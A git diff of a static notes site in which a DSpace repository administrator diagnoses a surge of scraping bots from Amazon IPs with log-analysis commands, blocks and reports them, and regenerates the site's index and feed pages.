+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
+ 128 dspaceApi
+ 16890 dspaceWeb
+
+- As for the server logs, I don’t see many IPs connecting today:
+
+# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
+2924
+
+- But there appear to be some IPs making many requests:
+
+# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
+...
+ 345 207.46.13.53
+ 646 66.249.66.222
+ 678 54.90.79.112
+ 1529 136.243.148.249
+ 1797 54.175.8.110
+ 2304 174.129.118.171
+ 2523 66.249.66.221
+ 2632 52.73.204.196
+ 2667 54.174.240.122
+ 5206 35.172.193.232
+ 5646 35.153.131.101
+ 6373 3.85.92.145
+ 7383 34.227.10.4
+ 8330 100.24.63.172
+ 8342 34.236.36.176
+ 8369 44.200.190.111
+ 8371 3.238.116.153
+ 8391 18.232.101.158
+ 8631 3.239.81.247
+ 8634 54.82.125.225
+
+- 54.82.125.225, 3.239.81.247, 18.232.101.158, 3.238.116.153, 44.200.190.111, 34.236.36.176, 100.24.63.172, 3.85.92.145, 35.153.131.101, 35.172.193.232, 54.174.240.122, 52.73.204.196, 174.129.118.171, 54.175.8.110, and 54.90.79.112 are all on Amazon and using this normal-looking user agent:
+
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.3
+
+- None of these hosts are re-using their DSpace session ID so they are definitely not normal browsers as they are claiming:
+
+$ grep 54.82.125.225 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+5760
+$ grep 3.239.81.247 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+6053
+$ grep 18.232.101.158 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+5841
+$ grep 3.238.116.153 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+5887
+$ grep 44.200.190.111 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+5899
+...
+
+- And we can see a massive spike in sessions in Munin:
+
+
+
+- I see the following IPs using that user agent today:
+
+# grep 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
+ 678 54.90.79.112
+ 1797 54.175.8.110
+ 2697 174.129.118.171
+ 2765 52.73.204.196
+ 3072 54.174.240.122
+ 5206 35.172.193.232
+ 5646 35.153.131.101
+ 6783 3.85.92.145
+ 7763 34.227.10.4
+ 8738 100.24.63.172
+ 8748 34.236.36.176
+ 8787 3.238.116.153
+ 8794 18.232.101.158
+ 8806 44.200.190.111
+ 9021 54.82.125.225
+ 9027 3.239.81.247
+
+- I added those IPs to the firewall and then purged their hits from Solr:
+
+$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+Purging 6024 hits from 100.24.63.172 in statistics
+Purging 1719 hits from 174.129.118.171 in statistics
+Purging 5972 hits from 18.232.101.158 in statistics
+Purging 6053 hits from 3.238.116.153 in statistics
+Purging 6228 hits from 3.239.81.247 in statistics
+Purging 5305 hits from 34.227.10.4 in statistics
+Purging 6002 hits from 34.236.36.176 in statistics
+Purging 3908 hits from 35.153.131.101 in statistics
+Purging 3692 hits from 35.172.193.232 in statistics
+Purging 4525 hits from 3.85.92.145 in statistics
+Purging 6048 hits from 44.200.190.111 in statistics
+Purging 1942 hits from 52.73.204.196 in statistics
+Purging 1944 hits from 54.174.240.122 in statistics
+Purging 1264 hits from 54.175.8.110 in statistics
+Purging 6117 hits from 54.82.125.225 in statistics
+Purging 486 hits from 54.90.79.112 in statistics
+
+Total number of bot hits purged: 67229
+
+- Then I created a CSV with these IPs and reported them to AbuseIPDB.com:
+
+$ cat /tmp/ips.csv
+IP,Categories,ReportDate,Comment
+100.24.63.172,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+174.129.118.171,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+18.232.101.158,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+3.238.116.153,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+3.239.81.247,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+34.227.10.4,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+34.236.36.176,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+35.153.131.101,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+35.172.193.232,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+3.85.92.145,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+44.200.190.111,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+52.73.204.196,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+54.174.240.122,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+54.175.8.110,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+54.82.125.225,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+54.90.79.112,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/docs/2022/04/cgspace-load.png b/docs/2022/04/cgspace-load.png
new file mode 100644
index 000000000..02851e3d6
Binary files /dev/null and b/docs/2022/04/cgspace-load.png differ
diff --git a/docs/2022/04/jmx_dspace_sessions-day2.png b/docs/2022/04/jmx_dspace_sessions-day2.png
new file mode 100644
index 000000000..8f77487a1
Binary files /dev/null and b/docs/2022/04/jmx_dspace_sessions-day2.png differ
diff --git a/docs/404.html b/docs/404.html
index 5ab1043b6..5c30c95f4 100644
--- a/docs/404.html
+++ b/docs/404.html
@@ -17,7 +17,7 @@
-
+
@@ -95,9 +95,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/index.html b/docs/categories/index.html
index 090338fa5..f04283e90 100644
--- a/docs/categories/index.html
+++ b/docs/categories/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -84,7 +84,7 @@
Notes
-
+
Read more →
@@ -108,9 +108,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/index.xml b/docs/categories/index.xml
index 367911ffb..a62cb3e0b 100644
--- a/docs/categories/index.xml
+++ b/docs/categories/index.xml
@@ -6,11 +6,11 @@
Recent content in Categories on CGSpace Notes
Hugo -- gohugo.io
en-us
- Tue, 01 Mar 2022 16:46:54 +0300
+ Fri, 01 Apr 2022 10:53:39 +0300
-
Notes
https://alanorth.github.io/cgspace-notes/categories/notes/
- Tue, 01 Mar 2022 16:46:54 +0300
+ Fri, 01 Apr 2022 10:53:39 +0300
https://alanorth.github.io/cgspace-notes/categories/notes/
diff --git a/docs/categories/notes/index.html b/docs/categories/notes/index.html
index 70b6de763..317f29fc9 100644
--- a/docs/categories/notes/index.html
+++ b/docs/categories/notes/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -81,6 +81,24 @@
+
+
+ April, 2022
+
+
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+ Read more →
+
+
+
+
+
+
+
March, 2022
@@ -107,24 +125,6 @@
-
-
- April, 2022
-
-
- 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
- Read more →
-
-
-
-
-
-
-
February, 2022
@@ -365,9 +365,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/notes/index.xml b/docs/categories/notes/index.xml
index 4d960654b..3fc75bf7d 100644
--- a/docs/categories/notes/index.xml
+++ b/docs/categories/notes/index.xml
@@ -6,7 +6,16 @@
Recent content in Notes on CGSpace Notes
Hugo -- gohugo.io
en-us
- Tue, 01 Mar 2022 16:46:54 +0300
+ Fri, 01 Apr 2022 10:53:39 +0300
+ -
+
April, 2022
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ Fri, 01 Apr 2022 10:53:39 +0300
+
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+
+
-
March, 2022
https://alanorth.github.io/cgspace-notes/2022-03/
@@ -24,15 +33,6 @@
</span></span></code></pre></div>
- -
-
April, 2022
- https://alanorth.github.io/cgspace-notes/2022-03/
- Tue, 01 Mar 2022 10:53:39 +0300
-
- https://alanorth.github.io/cgspace-notes/2022-03/
- 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
-
-
-
February, 2022
https://alanorth.github.io/cgspace-notes/2022-02/
diff --git a/docs/categories/notes/page/2/index.html b/docs/categories/notes/page/2/index.html
index 60f5b3b20..a11251ad6 100644
--- a/docs/categories/notes/page/2/index.html
+++ b/docs/categories/notes/page/2/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -381,9 +381,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/notes/page/3/index.html b/docs/categories/notes/page/3/index.html
index 1612f051a..3c05f6f29 100644
--- a/docs/categories/notes/page/3/index.html
+++ b/docs/categories/notes/page/3/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -404,9 +404,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/notes/page/4/index.html b/docs/categories/notes/page/4/index.html
index 7ad9f5b1e..cd98ee051 100644
--- a/docs/categories/notes/page/4/index.html
+++ b/docs/categories/notes/page/4/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -429,9 +429,9 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/notes/page/5/index.html b/docs/categories/notes/page/5/index.html
index de12161c7..fa909e40e 100644
--- a/docs/categories/notes/page/5/index.html
+++ b/docs/categories/notes/page/5/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -408,9 +408,9 @@ sys 2m7.289s
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/notes/page/6/index.html b/docs/categories/notes/page/6/index.html
index 0eb3e35a2..4c991788d 100644
--- a/docs/categories/notes/page/6/index.html
+++ b/docs/categories/notes/page/6/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -358,9 +358,9 @@ COPY 54701
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/cgiar-library-migration/index.html b/docs/cgiar-library-migration/index.html
index ed69b1eac..470540e82 100644
--- a/docs/cgiar-library-migration/index.html
+++ b/docs/cgiar-library-migration/index.html
@@ -18,7 +18,7 @@
-
+
@@ -282,9 +282,9 @@ dspace=# select setval('handle_seq',86873);
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/cgspace-cgcorev2-migration/index.html b/docs/cgspace-cgcorev2-migration/index.html
index 609a9532d..c8c005260 100644
--- a/docs/cgspace-cgcorev2-migration/index.html
+++ b/docs/cgspace-cgcorev2-migration/index.html
@@ -18,7 +18,7 @@
-
+
@@ -467,9 +467,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/cgspace-dspace6-upgrade/index.html b/docs/cgspace-dspace6-upgrade/index.html
index 217c9147f..67f0d693b 100644
--- a/docs/cgspace-dspace6-upgrade/index.html
+++ b/docs/cgspace-dspace6-upgrade/index.html
@@ -18,7 +18,7 @@
-
+
@@ -471,9 +471,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/index.html b/docs/index.html
index b08412a49..785076329 100644
--- a/docs/index.html
+++ b/docs/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -96,6 +96,24 @@
+
+
+ April, 2022
+
+
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+ Read more →
+
+
+
+
+
+
+
March, 2022
@@ -122,24 +140,6 @@
-
-
- April, 2022
-
-
- 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
- Read more →
-
-
-
-
-
-
-
February, 2022
@@ -380,9 +380,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/index.xml b/docs/index.xml
index 2b03396b1..6de35547f 100644
--- a/docs/index.xml
+++ b/docs/index.xml
@@ -6,7 +6,16 @@
Recent content on CGSpace Notes
Hugo -- gohugo.io
en-us
- Tue, 01 Mar 2022 16:46:54 +0300
+ Fri, 01 Apr 2022 10:53:39 +0300
+ -
+
April, 2022
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ Fri, 01 Apr 2022 10:53:39 +0300
+
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+
+
-
March, 2022
https://alanorth.github.io/cgspace-notes/2022-03/
@@ -24,15 +33,6 @@
</span></span></code></pre></div>
- -
-
April, 2022
- https://alanorth.github.io/cgspace-notes/2022-03/
- Tue, 01 Mar 2022 10:53:39 +0300
-
- https://alanorth.github.io/cgspace-notes/2022-03/
- 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
-
-
-
February, 2022
https://alanorth.github.io/cgspace-notes/2022-02/
diff --git a/docs/page/2/index.html b/docs/page/2/index.html
index 78eef02da..67bee93e3 100644
--- a/docs/page/2/index.html
+++ b/docs/page/2/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -396,9 +396,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/3/index.html b/docs/page/3/index.html
index 992c7afe9..0db5ab138 100644
--- a/docs/page/3/index.html
+++ b/docs/page/3/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -419,9 +419,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/4/index.html b/docs/page/4/index.html
index c74853c2d..3e8090fec 100644
--- a/docs/page/4/index.html
+++ b/docs/page/4/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -444,9 +444,9 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/5/index.html b/docs/page/5/index.html
index cd96e221f..dad4c62f6 100644
--- a/docs/page/5/index.html
+++ b/docs/page/5/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -423,9 +423,9 @@ sys 2m7.289s
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/6/index.html b/docs/page/6/index.html
index e644c9da7..c7b794b22 100644
--- a/docs/page/6/index.html
+++ b/docs/page/6/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -437,9 +437,9 @@ COPY 54701
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/7/index.html b/docs/page/7/index.html
index 7840c814a..72fbe8d92 100644
--- a/docs/page/7/index.html
+++ b/docs/page/7/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -388,9 +388,9 @@ DELETE 1
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/8/index.html b/docs/page/8/index.html
index ef638dd82..9a11ff26a 100644
--- a/docs/page/8/index.html
+++ b/docs/page/8/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -384,9 +384,9 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/9/index.html b/docs/page/9/index.html
index e2c4e739d..4b45b920e 100644
--- a/docs/page/9/index.html
+++ b/docs/page/9/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -145,9 +145,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/index.html b/docs/posts/index.html
index 8001303e8..1fdc5e0fa 100644
--- a/docs/posts/index.html
+++ b/docs/posts/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -96,6 +96,24 @@
+
+
+ April, 2022
+
+
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+ Read more →
+
+
+
+
+
+
+
March, 2022
@@ -122,24 +140,6 @@
-
-
- April, 2022
-
-
- 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
- Read more →
-
-
-
-
-
-
-
February, 2022
@@ -380,9 +380,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/index.xml b/docs/posts/index.xml
index 22bcc06c6..a4b96d859 100644
--- a/docs/posts/index.xml
+++ b/docs/posts/index.xml
@@ -6,7 +6,16 @@
Recent content in Posts on CGSpace Notes
Hugo -- gohugo.io
en-us
- Tue, 01 Mar 2022 16:46:54 +0300
+ Fri, 01 Apr 2022 10:53:39 +0300
+ -
+
April, 2022
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ Fri, 01 Apr 2022 10:53:39 +0300
+
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+
+
-
March, 2022
https://alanorth.github.io/cgspace-notes/2022-03/
@@ -24,15 +33,6 @@
</span></span></code></pre></div>
- -
-
April, 2022
- https://alanorth.github.io/cgspace-notes/2022-03/
- Tue, 01 Mar 2022 10:53:39 +0300
-
- https://alanorth.github.io/cgspace-notes/2022-03/
- 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
-
-
-
February, 2022
https://alanorth.github.io/cgspace-notes/2022-02/
diff --git a/docs/posts/page/2/index.html b/docs/posts/page/2/index.html
index 01281faa3..18a53bd74 100644
--- a/docs/posts/page/2/index.html
+++ b/docs/posts/page/2/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -396,9 +396,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/3/index.html b/docs/posts/page/3/index.html
index 2549bfbb4..42ca7e23a 100644
--- a/docs/posts/page/3/index.html
+++ b/docs/posts/page/3/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -419,9 +419,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/4/index.html b/docs/posts/page/4/index.html
index 59293c88e..d54e057c1 100644
--- a/docs/posts/page/4/index.html
+++ b/docs/posts/page/4/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -444,9 +444,9 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/5/index.html b/docs/posts/page/5/index.html
index 857278e24..7898d0ce0 100644
--- a/docs/posts/page/5/index.html
+++ b/docs/posts/page/5/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -423,9 +423,9 @@ sys 2m7.289s
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/6/index.html b/docs/posts/page/6/index.html
index 1294c4e9d..86b9f4c27 100644
--- a/docs/posts/page/6/index.html
+++ b/docs/posts/page/6/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -437,9 +437,9 @@ COPY 54701
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/7/index.html b/docs/posts/page/7/index.html
index fee3989f1..ab75a4ae1 100644
--- a/docs/posts/page/7/index.html
+++ b/docs/posts/page/7/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -388,9 +388,9 @@ DELETE 1
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/8/index.html b/docs/posts/page/8/index.html
index ccf6eb62b..3d6feb794 100644
--- a/docs/posts/page/8/index.html
+++ b/docs/posts/page/8/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
